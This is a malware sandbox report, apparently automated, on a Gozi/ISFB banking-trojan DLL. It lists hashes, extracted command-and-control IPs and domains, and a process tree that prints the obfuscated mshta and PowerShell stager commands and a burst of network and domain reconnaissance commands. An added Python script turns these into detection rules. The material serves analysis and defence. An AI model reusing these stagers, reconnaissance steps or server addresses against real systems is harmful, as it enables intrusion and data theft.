Analysis
Max time kernel: 151s
Max time network: 154s
Platform: windows10-2004_x64
Resource: win10v2004-20220722-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20220722-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 09-08-2022 12:29
Static task: static1
Behavioral task: behavioral1
Sample: f9d778ad3bfea174401f36a2d88851d8.dll
Resource: win7-20220715-en
General
Target: f9d778ad3bfea174401f36a2d88851d8.dll
Size: 378KB
MD5: f9d778ad3bfea174401f36a2d88851d8
SHA1: fd2b30e2f029939c31c759d9fbdd5ee5242137c0
SHA256: 44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
SHA512: 046ee69e01fc2e64b3cf75ccfa9a0886ef4e6752f9d90e199c67b8cc9cfdf767d8235b3a638fc96782cea0ff1b278f8d36a2ea25c9a5a839c0c03d199de5175a
Malware Config

Extracted: gozi_ifsb
3000
config.edge.skype.com
79.110.52.8
79.110.52.80
193.106.191.163
base_path: /drew/
build: 250240
exe_type: loader
extension: .jlk
server_id: 50

Extracted: gozi_ifsb
3000
79.110.52.82
79.110.52.94
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
base_path: /images/
build: 250240
exe_type: worker
extension: .jlk
server_id: 50
Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description / ioc / process):
  Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation mshta.exe

Suspicious use of SetThreadContext 8 IoCs
Processes (pid process -> target pid target process):
  1520 powershell.exe -> 1028 Explorer.EXE
  1716 regsvr32.exe -> 4028 control.exe
  1028 Explorer.EXE -> 3520 RuntimeBroker.exe
  1028 Explorer.EXE -> 3784 RuntimeBroker.exe
  1028 Explorer.EXE -> 4816 RuntimeBroker.exe
  1028 Explorer.EXE -> 3256 RuntimeBroker.exe
  4028 control.exe -> 4244 rundll32.exe
  1028 Explorer.EXE -> 3240 cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Discovers systems in the same network 1 TTPs 3 IoCs
Processes (pid process):
  2136 net.exe
  2588 net.exe
  4452 net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

Modifies registry class 64 IoCs
Processes: RuntimeBroker.exe
Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid process, number of events):
  1716 regsvr32.exe (2)
  1520 powershell.exe (2)
  1028 Explorer.EXE (60)

Suspicious behavior: MapViewOfSection 8 IoCs
Processes (pid process, number of events):
  1520 powershell.exe (1)
  1716 regsvr32.exe (1)
  1028 Explorer.EXE (5)
  4028 control.exe (1)

Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes (token / pid process):
  SeDebugPrivilege 1520 powershell.exe
  SeShutdownPrivilege 1028 Explorer.EXE (3 events)
  SeCreatePagefilePrivilege 1028 Explorer.EXE (3 events)
  4012 WMIC.exe, the following token sequence twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  SeShutdownPrivilege 3520 RuntimeBroker.exe
  SeDebugPrivilege 1208 tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs
Processes (pid process):
  1028 Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid process -> target pid target process, number of write events):
  1184 regsvr32.exe -> 1716 regsvr32.exe (3)
  376 mshta.exe -> 1520 powershell.exe (2)
  1520 powershell.exe -> 2812 csc.exe (2)
  2812 csc.exe -> 3684 cvtres.exe (2)
  1520 powershell.exe -> 3736 csc.exe (2)
  3736 csc.exe -> 4164 cvtres.exe (2)
  1520 powershell.exe -> 1028 Explorer.EXE (4)
  1716 regsvr32.exe -> 4028 control.exe (5)
  1028 Explorer.EXE -> 3520 RuntimeBroker.exe (4)
  1028 Explorer.EXE -> 3784 RuntimeBroker.exe (4)
  1028 Explorer.EXE -> 4816 RuntimeBroker.exe (4)
  1028 Explorer.EXE -> 3256 RuntimeBroker.exe (4)
  4028 control.exe -> 4244 rundll32.exe (5)
  1028 Explorer.EXE -> 4196 cmd.exe (2)
  4196 cmd.exe -> 4012 WMIC.exe (2)
  1028 Explorer.EXE -> 3240 cmd.exe (6)
  4196 cmd.exe -> 3084 more.com (2)
  1028 Explorer.EXE -> 1224 cmd.exe (2)
  1028 Explorer.EXE -> 2348 cmd.exe (2)
  2348 cmd.exe -> 3636 systeminfo.exe (2)
  1028 Explorer.EXE -> 1308 cmd.exe (2)
  1028 Explorer.EXE -> 1448 cmd.exe (1)
Processes (child processes are indented under their parent)
-
C:\Windows\System32\RuntimeBroker.exe
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
C:\Windows\System32\RuntimeBroker.exe
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- Modifies registry class
PID:3256
-
C:\Windows\System32\RuntimeBroker.exe
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID:4816
-
C:\Windows\System32\RuntimeBroker.exe
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID:3784
-
C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1028
    C:\Windows\system32\regsvr32.exe
    Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
    - Suspicious use of WriteProcessMemory
    PID:1184
        C:\Windows\SysWOW64\regsvr32.exe
        Command line: /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
        PID:1716
            C:\Windows\system32\control.exe
            Command line: C:\Windows\system32\control.exe -h
            - Suspicious use of SetThreadContext
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of WriteProcessMemory
            PID:4028
                C:\Windows\system32\rundll32.exe
                Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                PID:4244
    C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:376
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID:1520
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"
            - Suspicious use of WriteProcessMemory
            PID:2812
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"
                PID:3684
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"
            - Suspicious use of WriteProcessMemory
            PID:3736
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"
                PID:4164
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    - Suspicious use of WriteProcessMemory
    PID:4196
        C:\Windows\system32\more.com
        Command line: more
        PID:3084
    C:\Windows\syswow64\cmd.exe
    Command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
    PID:3240
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:1224
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    - Suspicious use of WriteProcessMemory
    PID:2348
        C:\Windows\system32\systeminfo.exe
        Command line: systeminfo.exe
        - Gathers system information
        PID:3636
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:1308
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:1448
        C:\Windows\system32\net.exe
        Command line: net view
        - Discovers systems in the same network
        PID:2136
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:3756
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:3588
        C:\Windows\system32\nslookup.exe
        Command line: nslookup 127.0.0.1
        PID:3116
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:4924
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:396
        C:\Windows\system32\tasklist.exe
        Command line: tasklist.exe /SVC
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
        PID:1208
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:1272
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:5004
        C:\Windows\system32\driverquery.exe
        Command line: driverquery.exe
        PID:1956
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:4560
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:5076
        C:\Windows\system32\reg.exe
        Command line: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
        PID:3164
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:3428
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:2076
        C:\Windows\system32\net.exe
        Command line: net config workstation
        PID:3636
            C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 config workstation
            PID:4304
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:3632
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:4992
        C:\Windows\system32\nltest.exe
        Command line: nltest /domain_trusts
        PID:3960
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:4552
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:4508
        C:\Windows\system32\nltest.exe
        Command line: nltest /domain_trusts /all_trusts
        PID:2812
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:3272
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:1160
        C:\Windows\system32\net.exe
        Command line: net view /all /domain
        - Discovers systems in the same network
        PID:2588
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:856
    C:\Windows\system32\cmd.exe
    Command line: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
    PID:4352
        C:\Windows\system32\net.exe
        Command line: net view /all
        - Discovers systems in the same network
        PID:4452
-
C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic computersystem get domain
- Suspicious use of AdjustPrivilegeToken
PID:4012
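Two things in this tree are worth a detection rule. First, the stagers that pull the next stage out of HKCU\Software\AppDataLow\Software\Microsoft\<GUID>: mshta.exe evaluates the LineStop value through an about:<hta:application> document, and powershell.exe ASCII-decodes MaskStop and pipes it to iex behind throwaway aliases, so neither stage touches disk. Second, the discovery burst in which Explorer.EXE spawns one cmd.exe per tool (wmic, systeminfo, net view, nslookup, tasklist, driverquery, reg query, net config, nltest) and appends every result to %TEMP%\3BC.bin1 with echo separators between them. The script below is an added example, not sandbox or sample code, that runs both rules over constructed process-creation records shaped like the tree (pid, ppid, image, command line, seconds since the first event). The two stager command lines are copied from the tree; the timestamps, field names, rule names and the four-tool threshold are this example's own choices.

```python
"""Flag the registry-resident stagers and the discovery burst from the
process tree above.

Added example for this report; not sandbox or sample code.  The events are
constructed; only the two stager command lines are copied from the tree.
"""
import re
from collections import defaultdict

# Discovery commands the sample appends, one cmd.exe each, to one temp file.
DISCOVERY_TOOLS = (
    "systeminfo", "net view", "nslookup", "tasklist", "driverquery",
    "reg.exe query", "net config workstation", "nltest", "wmic computersystem",
)
# Output redirection inside cmd /C "...": captures the target path.
REDIRECT_RE = re.compile(r'>>?\s*(?P<path>[A-Za-z]:\\[^\s"]+)')
# The AppDataLow\Software\Microsoft\<GUID>\<value> location both stagers read.
# Accepts the JScript-escaped backslashes of the mshta form and the
# HKCU:...\<GUID>").<value> form of the PowerShell stager.
REG_PATH_RE = re.compile(
    r'HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft\\+'
    r'(?P<guid>[0-9A-Fa-f-]{36})(?:\\+|"\)\.)(?P<value>\w+)', re.I)

MSHTA_CMD = r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"'''
PS_CMD = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))'''
TMP = r"C:\Users\Admin\AppData\Local\Temp\3BC.bin1"


def _cmd(pid, ts, body):
    """Constructed cmd.exe record spawned by Explorer.EXE (PID 1028)."""
    return {"pid": pid, "ppid": 1028, "ts": ts,
            "image": r"C:\Windows\system32\cmd.exe", "cmdline": f'cmd /C "{body}"'}


# Constructed process-creation records; timestamps are invented.
SAMPLE_EVENTS = [
    {"pid": 376, "ppid": 1028, "ts": 0, "image": r"C:\Windows\System32\mshta.exe", "cmdline": MSHTA_CMD},
    {"pid": 1520, "ppid": 376, "ts": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": PS_CMD},
    _cmd(4196, 10, f"wmic computersystem get domain |more > {TMP}"),
    _cmd(1224, 11, f"echo -------- >> {TMP}"),          # separator, no tool
    _cmd(2348, 12, f"systeminfo.exe > {TMP}"),
    _cmd(1448, 14, f"net view >> {TMP}"),
    _cmd(3588, 15, f"nslookup 127.0.0.1 >> {TMP}"),
    _cmd(396, 16, f"tasklist.exe /SVC >> {TMP}"),
    _cmd(5004, 17, f"driverquery.exe >> {TMP}"),
    _cmd(4992, 18, f"nltest /domain_trusts >> {TMP}"),
    _cmd(4508, 19, f"nltest /domain_trusts /all_trusts >> {TMP}"),  # same tool again
]


def classify_stager(ev):
    """Rule name for the mshta or PowerShell registry stager, else None."""
    img, low = ev["image"].lower(), ev["cmdline"].lower()
    if img.endswith("mshta.exe") and "about:<hta:application>" in low and "regread(" in low:
        return "stager.mshta_registry_eval"
    if (img.endswith("powershell.exe") and "appdatalow" in low
            and re.search(r"\biex\b|invoke-expression", low)):
        return "stager.powershell_registry_iex"
    return None


def discovery_tool(cmdline):
    """First known discovery tool named in the command line, else None."""
    low = cmdline.lower()
    return next((t for t in DISCOVERY_TOOLS if t in low), None)


def detect(events, window=120, min_tools=4):
    """One finding per stager event, plus one per (parent, output file) that
    collected at least min_tools distinct discovery commands within window s."""
    findings = []
    bursts = defaultdict(dict)            # (ppid, outfile) -> {tool: first ts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        rule = classify_stager(ev)
        if rule:
            m = REG_PATH_RE.search(ev["cmdline"])
            findings.append({"rule": rule, "pid": ev["pid"],
                             "reg_key_guid": m["guid"] if m else None,
                             "reg_value": m["value"] if m else None})
        elif ev["image"].lower().endswith("cmd.exe"):
            tool = discovery_tool(ev["cmdline"])
            redir = REDIRECT_RE.search(ev["cmdline"])
            if tool and redir:
                bursts[(ev["ppid"], redir["path"].lower())].setdefault(tool, ev["ts"])
    for (ppid, path), tools in bursts.items():
        first, last = min(tools.values()), max(tools.values())
        if len(tools) >= min_tools and last - first <= window:
            findings.append({"rule": "discovery.burst_to_single_file", "pid": ppid,
                             "outfile": path, "tools": sorted(tools), "span_s": last - first})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

The stager findings carry the key GUID and value name, which is what a responder needs to pull the actual next stage off the host (the values are binary blobs, hence the ASCII.GetString in the PowerShell form). The burst rule keys on the parent PID and the output file rather than on the child PIDs: the tree on this page reuses PID 3636 (systeminfo.exe, later net.exe) and PID 2812 (csc.exe, later nltest.exe) within the same run, so short-lived children must be correlated by (pid, start time) or by a process handle, never by pid alone.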
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize 44B
MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
Filesize not given (these are the hashes of a zero-byte file)
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize 2KB (listed twice in the report)
MD5 debbdb9be3bb09adf5d355ab9c36187a
SHA1 f44a6c37253abc4ad266d46b4b62d50398e0c570
SHA256 cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643
SHA512 f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332
-
Filesize 2KB
MD5 d4261765df37d03c995a3f88337551b9
SHA1 31303377a5d5808157badd5a7be5c87f673d937a
SHA256 26b2ede70ff95672d6c7c3ad8a6140e333ff97d8671c56a4ecbf2527ceec3a08
SHA512 4b7fa34739bc78de8a0a5d71ea56a47d34f107ba9dd543e87a0e74c92e0f21b14c06c8c1ed904a693b3e2037a52a87ffa8545adc2b6de5b132f1579bc9e4ad83
-
Filesize 2KB (listed twice in the report)
MD5 f3732be8e8ad283b090cb47ded28b20b
SHA1 c880ff4fcfcc3d92ffaaa02cb0c38151661989b8
SHA256 b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b
SHA512 1eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a
-
Filesize 9KB
MD5 eafa11d2f82e86981c80a77d3c8621bc
SHA1 c796b1c198d2c0d3acd73215bb3320b8261d660a
SHA256 6cb061fa9c465cab49795750b943a79832c1d5dbc685e7ab6e4e6b2d5d6e4880
SHA512 d95abdc4cbd9b3c1775bf8eee76651daad15dacbad3888b0a36e54a3a76169dbb624e11bcad43d204ffc650169d657974be12a7bf93fb5dc3dc94e51e2e5c2cf
-
Filesize 9KB
MD5 28cefb694a0586baee4068b1b707ee3f
SHA1 5d90d010403e168576e861f9f5dc832649fb1fa5
SHA256 dcf901d2adf9af1ae75fabf121e350849d03cb0b2c2aabefdc06f25cb1ba58fc
SHA512 ed219a37df106104237d5034e18f5ebb6f4d766df140586848597f7bf773e22dde330f9d9be3a71f3214a143556c9a4e0cf347376979cdbcbece7d3604f7a0ec
-
Filesize 35KB (listed twice in the report)
MD5 91dd82dc33272e52b2b0634128912fc3
SHA1 5b31d5b431db80873bc8501ca96401c69da84e76
SHA256 533b8a08428ee97abe45244f3133ab3d3c40022ecef388d6aa5cbff79c784c9b
SHA512 19c4165763766db298c97c2254e5285560526f2bbb5a21ac84dbdd2fd116b6fdb01de5d447cb34c2a150f14ce8d1a546a317460715dd54a3bc9890a17c374348
-
Filesize 64KB (listed twice in the report)
MD5 bc99dc8482dbf6e658713e410a772962
SHA1 5120b2893f19960db065bc2fc777941ad8a7e4f7
SHA256 39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b
SHA512 3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2
-
Filesize 64KB (listed twice in the report)
MD5 9584e50ab516f8f3d8473f756acf9a7c
SHA1 f3ef6233adf9681aefbf67c2c83566518c921ee6
SHA256 287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd
SHA512 5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5
-
Filesize 64KB
MD5 d8cf63e49c3f22e79e05dde487f6f2f2
SHA1 7fc8c73ceaf0d108b9d8a2a325ad05ed1413a104
SHA256 93e3177026041e353d040d414a06570490aea739a2bcb57520532e8f216749c1
SHA512 f437bc7bf48089acc46f10596adbf069cc12e8ce5ef6d0520f73e5e828a196e0c4a2b087f118b469deb2795c02c55f53c2a54dfcbc2d85a3a803084d41ecacd8
-
Filesize 64KB
MD5 6d26aa73f630a7f0276b0cd428f1de06
SHA1 5a0084e7e4bd9aff05543636ca23bea0bf0dcb2a
SHA256 6bdcab6cb14d61e0ccc90a59692b1e44ad4c1624b0628318e2410d9333a12203
SHA512 a3f6d623a0e7ec89416f28277774c35f146102ab443695cb321c0154ca37061333035bb504bda3d786a00c49c0d1aca51f325eb02623304cd0dfcfd4e244282f
-
Filesize 64KB
MD5 4746429b9b2c92103225650b6059c26a
SHA1 df81d1724ecd7f3c09945120dc0022d0f7d4bb23
SHA256 f59ddebc18b1d25727aa3ab6f4046c987e063917da6fa0d9419397a6243d0db6
SHA512 17f0128be903af9bed8f96bd4c296690d0ddf63658b50efca0efa7fea0da07db830e7eae5bdc0c3b7f6da7389a5e528a3929110d731d12c290c5da6c1a943e96
-
Filesize 1KB
MD5 01f190bdaec04de221b7e23b41a74673
SHA1 32023da04ece8010950b5fab4c491904eeadc205
SHA256 9cdf726460c06e4331b7a20f0dec43563ccad65d5ff051ad22a0abc7c6688758
SHA512 47d437eeb7252b7d11d15bba087c5b3bcc782115c642f8efc0fc582286c11717046fd96587cb8a704053a7c7ffa6f63aeb67d3283035e94e32671fc6fadf6bb9
-
Filesize 1KB
MD5 a59eb24fd5eed325703f8d6222d7629c
SHA1 01a89b751816810e82f56bc7a5b10e8c32baabf1
SHA256 5cba1917347a9255c50aa22cf47aaf65a3c9eb544960980f61cacf30c3a5b914
SHA512 096a523455063b05c49e491d3c065351345a9c7fcd82b42bfc9642ee6206e0a3395ed8fdae8990c0ca046fbe7d8de61db08a835904d24b15a7df05a617aa4725
-
Filesize 3KB
MD5 6ae7ab6abc2bc1ee1a3679f79e3220e0
SHA1 dd04108b32b3570b14b409f961798359dadae553
SHA256 5e52468c58b126d14bef7c8d9c611de371ec60caaf61456f334bd5a75173ec5c
SHA512 7845c853fadea28684338ffe5e2bd5f263030e507faba8dac30176d34eeb01a56e11b7639031c0f31b20d1dd138fa040599b96383eb60e59fa7458b3bddf61c0
-
Filesize 3KB
MD5 92be12bfb85cea8510497b97e1deb99a
SHA1 2ae7bc20bf614747a77b9aefb76ab15b3fb66e5f
SHA256 87d6faa6d06cf1ae59c4c5f969aacd6851b256916ac5a086a6f5ea87509e3700
SHA512 079c54e47708c06ba73e7ada9bc305ff02493b1fdcd0fc614b8acd3b4f9473c90e3d7bbca67be83c668c9e88c87b7aed30e761dfbad835e6d1f810d29bd9d3ad
-
Filesize 652B
MD5 01c7ea8256a930100666ac66c9292ab6
SHA1 37bf5871ed1239236438b665a914a250f217e32e
SHA256 78ea4ba18db4484a618b4fc713585d7501d670985caa64d86c5485a2b932ebcb
SHA512 9f807460bb3b17166e1f6ec2fadbb74daa3b5063e6971383c91c093430e27ea6d723a1c73a345c2576d4ef42c6bc7da72a84083a9675e37507fa3920af2aae97
-
Filesize 400B
MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6
-
Filesize 369B
MD5 abe6a4f47746fa860e1827b2c160669a
SHA1 b4dbfa0ea503c044b4111ab819346464e4f26845
SHA256 6e99ca8c4c8a091392752e48beb56fe261b7e55e9d51c2904ef221ebf9e038b3
SHA512 ee7828e0ec18dfb5c2c5421a24021ac7fe81bda3dfbc288bd9a9043da41129ab4b1723f3dac58da79ab0c1d18f12947456944b1089679999cd6a16da62619f60
-
Filesize 652B
MD5 488518a0854dc8d2129d0e1623a37a6a
SHA1 f5f381735a11d7b572f0f8617afc5ad69cef2cdd
SHA256 babfdb1d940c0addee61aab483cf71ac5fead11352ae8baa0d980a3bdca8585c
SHA512 105f4f8ef0aa23ec4d6292f12f925563def203ad669aed110cda635903d721cf05ab39bd6a8d727c602d86ee515c79fe231ae46a5fd827228136f72889a6f329
-
Filesize 410B
MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28
-
Filesize 369B
MD5 6c9aa04fb876e079685966d995bdb398
SHA1 5e75d849b04c782604dd2f7e8a7d61c590ad2fe7
SHA256 9069a1f3043fd0eda2817ba12d85a529e4455af44d411f02bb131451bc50dce8
SHA512 1161df029aaa506f94b45c1527d031361c189ad1bc3ca899bfcabd016aef5052dbedab3db0b2cd9c74dc90df0dd3c7e92f90df46d8b4695df9371f732fe9987b